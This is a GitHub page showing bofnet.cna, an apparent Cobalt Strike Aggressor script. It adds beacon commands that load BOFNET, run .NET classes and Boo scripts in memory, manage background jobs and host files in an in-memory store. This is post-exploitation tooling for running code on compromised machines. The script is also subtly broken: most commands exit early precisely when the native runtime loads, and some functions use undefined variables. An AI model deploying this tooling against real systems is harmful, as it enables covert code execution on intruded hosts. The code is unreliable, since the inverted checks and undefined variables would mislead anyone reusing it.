-
-
Notifications
You must be signed in to change notification settings - Fork 99
/
Copy pathbofnet.cna
227 lines (175 loc) · 7.66 KB
/
bofnet.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
# beacons
beacon_command_register("bofnet_init", "Initialize beacon ready to run BOFNET", "Synopsis: bofnet_init \nInitialize beacon ready to run BOFNET");
beacon_command_register("bofnet_shutdown", "Shutdown the BOFNET AppDomain", "Synopsis: bofnet_shutdown \nShutdown the BOFNET AppDomain");
beacon_command_register("bofnet_list", "List all executable BOFNET's available", "Synopsis: bofnet_list \nList all executable BOFNET's available");
beacon_command_register("bofnet_listassemblies", "List all loadded assembiles inside BOFNET", "Synopsis: bofnet_listassemblies \nList all loadded assembiles inside BOFNET");
beacon_command_register("bofnet_execute", "Execute a BOFNET class", "Synopsis: bofnet_execute class arg1 arg2 ...\nExecute's a BOFNET class along with all arguments supplied. Arguments with spaces should be quoted.\n");
beacon_command_register("bofnet_load", "Load a .NET assembly containing additional BOFNET classes", "Synopsis: bofnet_load assembly_path\nLoad a .NET assembly containing additional BOFNET classes\n");
beacon_command_register("bofnet_job", "Execute a BOFNET class as a background job in a seperate threead", "Synopsis: bofnet_job class arg1 arg2\nExecute a BOFNET class as a background job\n");
beacon_command_register("bofnet_jobs", "List active BOFNET background jobs", "Synopsis: bofnet_jobs\nList active BOFNET background jobs\n");
beacon_command_register("bofnet_jobstatus", "Dump the console buffer of an active BOFNET background job", "Synopsis: bofnet_jobstatus jobid\nDump the console buffer of an active BOFNET background job\n");
beacon_command_register("bofnet_jobkill", "Kills a running jobs thread (warning, could leave leaked resources/sockets behind", "Synopsis: bofnet_jobkill jobid\nKills a running jobs thread (warning, could leave leaked resources/sockets behind\n");
beacon_command_register("bofnet_boo", "Runs a Boo script in a temporary AppDomain which is then unloaded", "Synopsis: bofnet_boo filename.boo\nRuns a Boo script in a temporary AppDomain which is then unloaded\n");
beacon_command_register("bofnet_vfs_add", "Uploads a file to the in memory VFS storage", "Synopsis: bofnet_vfs_add local_path filename content_type\Uploads a file to the in memory VFS store\n");
sub readAllFileData {
$fileHandle = openf($1);
$fileData = readb($fileHandle, -1);
closef($fileHandle);
return $fileData;
}
sub addQuotes {
$result = "";
$idx = 0;
foreach $entry ($1){
$entry = matches($entry, '\s*(.*)')[0];
$result = $result . "\"$entry\"";
if($idx != size($1) - 1){
$result = $result . " ";
}
$idx++;
}
return $result;
}
sub loadBOFNativeRuntime {
$nativeBOFPath = script_resource('bofnet_execute.cpp.'.barch($1).'.obj') ;
if(-exists $nativeBOFPath){
return readAllFileData($nativeBOFPath);
}else{
blog($1, "[!] The BOFNET native runtime file $nativeBOFPath doesn't exist");
return $null;
}
}
sub bofnet_execute_raw{
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
beacon_inline_execute($1, $bofnetNative, "go", "$2\x00".$3);
}
# Not secure random string by any means!
sub generateRandomString {
$validChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890";
$validCharsCount = strlen($validChars);
$randomString = "";
for( $idx = 0; $idx < $1; $idx++){
$randomString = $randomString . charAt($validChars, rand($validCharsCount));
}
return $randomString;
}
alias bofnet_init {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
$bofnetRuntime = readAllFileData(script_resource('BOFNET.dll'));
btask($1, "Initializing BOFNET");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Initializer\x00".$bofnetRuntime);
}
alias bofnet_shutdown {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
btask($1, "Shuting down BOFNET");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Shutdown\x00");
}
alias bofnet_list {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
btask($1, "Listing BOFNET classes");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.List\x00");
}
alias bofnet_listassemblies {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
btask($1, "Listing loaded BOFNET assemblies");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.ListAssemblies\x00");
}
alias bofnet_execute {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
$bofArguments = "\x00";
@argParts = sublist(@_,2);
if(size(@argParts) > 0){
$bofArguments = " ".addQuotes(@argParts)."\x00";
}
btask($1, "Attempting to execute BOFNET $2");
beacon_inline_execute($1, $bofnetNative, "go", $2.$bofArguments);
}
alias bofnet_load{
local('$assemblyData');
# 900k chunks sent to leave room for protocol data too
$chunkSize = 1024 * 900 ;
if(-exists $2){
$assemblyData = readAllFileData($nativeBOFPath);
}else{
blog($1, "[!] The file $2 doesn't seem to exist, missing quotes by any chance?");
return;
}
btask($1, "Attempting to load large .NET assembly $2 into BOFNET");
$rawData = readAllFileData($2);
$numChunks = strlen($rawData) / $chunkSize;
$remainder = strlen($rawData) % $chunkSize;
$id = generateRandomString(8);
for($i = 0; $i < $numChunks; $i++){
$chunk = substr($rawData, $i * $chunkSize, ($i * $chunkSize) + $chunkSize);
$assemblyData = bof_pack($1, "Zib", $id , $chunkSize, $chunk) ;
bofnet_execute_raw($1, "BOFNET.Bofs.AssemblyLoader", $assemblyData);
}
if($remainder > 0){
$chunk = substr($rawData, $numChunks * $chunkSize, ($numChunks * $chunkSize) + $remainder + 1);
$assemblyData = bof_pack($1, "Zib", $id , $chunkSize, $chunk) ;
bofnet_execute_raw($1, "BOFNET.Bofs.AssemblyLoader", $assemblyData);
}
}
alias bofnet_job {
$bofnetNative = loadBOFNativeRuntime($1);
if($bofnetNative != $null){
return;
}
$bofArguments = "\x00";
@argParts = sublist(@_,2);
if(size(@argParts) > 0){
$bofArguments = " ".addQuotes(@argParts)."\x00";
}
btask($1, "Attempting to start BOFNET $2 as a job");
beacon_inline_execute($1, $bofnetNative, "go", "BOFNET.Bofs.Jobs.JobRunner ".$2.$bofArguments);
}
alias bofnet_jobs {
fireAlias($1, "bofnet_execute", "BOFNET.Bofs.Jobs.JobList");
}
alias bofnet_jobstatus {
fireAlias($1, "bofnet_execute", "BOFNET.Bofs.Jobs.JobStatus ".$2);
}
alias bofnet_jobkill {
fireAlias($1, "bofnet_execute", "BOFNET.Bofs.Jobs.JobKill ".$2);
}
alias bofnet_boo {
local('$booCode @argParts $scriptArgs');
$booCode = readAllFileData($2);
$scriptArgs = "";
@argParts = sublist(@_,2);
if(size(@argParts) > 0){
$scriptArgs = addQuotes(@argParts);
}
$args = bof_pack($bid, "bZ", $booCode , $scriptArgs);
blog ($1, "Executing script $2 with the following arguments: $scriptArgs");
bofnet_execute_raw($1, "BOFNET.Bofs.Boo.BooRunner", $args);
}
alias bofnet_vfs_add{
local('$fileData $args');
if(size(@_) != 4){
blog($1, "[!] Usage: bofnet_hostfile local_path hosting_filename content_type");
return;
}
$fileData = readAllFileData($2);
$args = bof_pack($1, "bZZ", $fileData , $3, $4);
blog($1, "Attempting to host file $2 (" . strlen($fileData) . " bytes) inside the BOFNET VFS");
bofnet_execute_raw($1, "BOFNET.Bofs.VFS", $args);
}